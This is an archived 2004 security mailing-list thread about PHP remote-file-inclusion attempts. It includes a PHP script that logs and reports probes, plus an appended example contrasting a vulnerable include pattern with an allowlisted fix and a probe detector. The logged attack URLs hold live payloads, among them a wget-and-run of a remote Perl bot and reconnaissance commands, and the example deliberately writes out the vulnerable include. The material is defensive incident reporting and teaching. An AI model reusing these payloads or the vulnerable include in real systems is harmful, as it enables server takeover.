Security Incidents mailing list archives
RE: PHP injection attempt from 200.222.244.154
From: "KEM Hosting" <security () kemhosting com>
Date: Tue, 23 Nov 2004 09:48:54 -0600
I have received so many of these style attacks that I modified my index pages and wrote a script to handle the attempts (see below). It automatically redirects the hacker/user to the script if the URL query string contains "://".

Most recent attempts:

200.221.255.182 via: http://www.spykidsgroup.net/spy.gif?&cmd=cd%20/tmp;wget%20www.spykidsgroup.net/bot.perl;perl%20bot.perl
213.228.82.91 via: http://faq111.narod.ru/1&cmd=uname%20-a
200.221.222.55 via: http://hc.ircdrinks.net/cmd.gif?&cmd=uname%20-a
200.228.78.30 via: http://dd0s.0catch.com/cse.gif?&cmd=id
200.222.227.38 via: http://members.lycos.co.uk/mastadog/readme.txt?&cmd=id;uptime;uname%20-a;w;wget;curl
200.221.223.131 via: http://www.spykidsgroup.net/spy.gif?&shell=write
203.130.228.74 via: http://geocities.com/k4but/suntik.txt?&cmd=id
201.8.100.232 via: http://www.irs-online.it/guns/spy.gif?&cmd=locate%20config.inc.php

Pretty much all the scripts are the same code base, just slightly modified.

============= Hack Handler =============

<?PHP
// Collect the client address plus any proxy-supplied addresses
function getIP() {
    $tmparr = array();
    $tmparr[] = $_SERVER['REMOTE_ADDR'];
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // array_merge appends the forwarded list; the original "+=" array
        // union silently dropped entries whose numeric key already existed
        $tmparr = array_merge($tmparr, explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']));
    }
    return $tmparr;
}

$ip = getIP();
$content = "";
foreach ($ip as $i) {
    $content .= "$i\n";
}
$content .= print_r($_SERVER, true); // add everything else for posterity

$headers  = "MIME-Version: 1.0\r\n";
$headers .= "From: Alert <security () domain com>\r\n";
$headers .= "Reply-to: security <security () domain com>\r\n";
$headers .= "X-Priority: 3\r\n";
$headers .= "X-Mailer: PHP mailer\r\n";
mail("alert () domain com", "URL Hack Attempt", $content, $headers, "-f security () domain com");

// now, log the hack to the system log
// (define_syslog_variables() is not needed for this and was removed in PHP 5.4)
openlog("PHPLog", LOG_PID | LOG_PERROR, LOG_LOCAL0);
$access = date("Y/m/d H:i:s");
$ip = implode(",", $ip);
syslog(LOG_WARNING, "Hack Attempt: $access $ip $_SERVER[REQUEST_URI]");
closelog();

echo "You're not playing nicely.<BR>Your IP has been logged and the admin has been notified.";
?>

-----Original Message-----
From: Kirby Angell [mailto:kangell () alertra com]
Sent: Saturday, November 20, 2004 3:23 PM
To: Incidents List
Subject: PHP injection attempt from 200.222.244.154

SOA: 20041120 14:34 CST
EOA: 20041120 14:34 CST
ATTACK-IP: 200.222.244.154/Linux/Brazil (A1)
TARGET-IP: 204.249.195.250 (V1)

Summary

This attack was an attempt to get a malicious PHP script run on the victim through a common PHP coding error. The web server's page in this case was not susceptible to the attack and a 302 Not Found error was returned.

...

In the first attempt, the attacker tried:
http://uptime.alertra.com/uptime3?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a

The rest of the attempts the attacker tried:
http://uptime.alertra.com/uptime.php?pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a

.....
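The following is an added example, not code from KEM Hosting or Kirby Angell. It puts the "common PHP coding error" Kirby refers to (a request parameter used as an include path) beside an allowlisted version, and shows a detector for the "://" marker KEM's handler keys on, extended to catch percent-encoded schemes and the cmd=/shell= parameters seen in the samples above. The function names, the PAGES map, the $trustedProxies list and the sample query strings are this example's own assumptions.

```php
<?php
// Added example. Contrasts the include pattern the thread's probes target with
// an allowlisted version, plus a query-string probe detector and an address
// collector that only trusts X-Forwarded-For behind known proxies.

// Vulnerable pattern (assumed shape of the "common coding error"): a request
// parameter becomes the include path. With allow_url_include enabled, a value
// like ?pin=http://host/file fetches and executes remote code.
function vulnerableDispatch(array $get): void {
    include($get['pin'] . '.php');
}

// Hardened pattern: the parameter is only a key into a fixed map; nothing
// taken from the request is ever used as a path.
const PAGES = array(
    'uptime' => 'pages/uptime.php',
    'status' => 'pages/status.php',
);

function safeDispatch(array $get): string {
    $key = isset($get['pin']) ? (string) $get['pin'] : 'uptime';
    if (!array_key_exists($key, PAGES)) {
        http_response_code(404);
        return '';
    }
    return PAGES[$key]; // caller then does include(PAGES[$key])
}

// Probe detector: true if the query string carries a URL scheme or one of the
// cmd=/shell= parameters from the thread's samples. Decoding first means an
// encoded %3A%2F%2F is caught as well as a literal "://".
function looksLikeInclusionProbe(string $queryString): bool {
    $decoded = rawurldecode($queryString);
    if (strpos($decoded, '://') !== false) {
        return true;
    }
    return (bool) preg_match('/(^|[?&])(cmd|shell)=/i', $decoded);
}

// Address collection that treats X-Forwarded-For as client-controlled unless
// REMOTE_ADDR is one of our own reverse proxies, and keeps only valid IPs.
function clientAddresses(array $server, array $trustedProxies): array {
    $addrs = array($server['REMOTE_ADDR']);
    if (in_array($server['REMOTE_ADDR'], $trustedProxies, true)
        && isset($server['HTTP_X_FORWARDED_FOR'])) {
        foreach (explode(',', $server['HTTP_X_FORWARDED_FOR']) as $hop) {
            $hop = trim($hop);
            if (filter_var($hop, FILTER_VALIDATE_IP) !== false) {
                $addrs[] = $hop;
            }
        }
    }
    return $addrs;
}

// Constructed sample query strings modelled on the thread's probes.
$samples = array(
    'pin=http://geocities.yahoo.com.br/packx1/cs.jpg?&cmd=uname%20-a',
    'pin=http%3A%2F%2Fexample.invalid%2Fx.txt%3F&cmd=id',
    'pin=uptime',
);
foreach ($samples as $qs) {
    printf("%-68s %s\n", $qs, looksLikeInclusionProbe($qs) ? 'PROBE' : 'ok');
}

// Constructed $_SERVER-style input: a forwarded header that is only honoured
// because REMOTE_ADDR is in the trusted proxy list.
$server = array(
    'REMOTE_ADDR'          => '10.0.0.2',
    'HTTP_X_FORWARDED_FOR' => '198.51.100.7, not-an-ip',
);
print_r(clientAddresses($server, array('10.0.0.2')));
```

The first two samples are reported as PROBE and the third as ok; the address collector returns 10.0.0.2 and 198.51.100.7 and discards the junk hop. Logging every forwarded hop, as the handler above does, is still useful for posterity, but only the REMOTE_ADDR (or the hop supplied by a proxy you control) should drive any blocking decision.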
Current thread:
- PHP injection attempt from 200.222.244.154 Kirby Angell (Nov 22)
- RE: PHP injection attempt from 200.222.244.154 KEM Hosting (Nov 23)
- Re: PHP injection attempt from 200.222.244.154 Kirby Angell (Nov 24)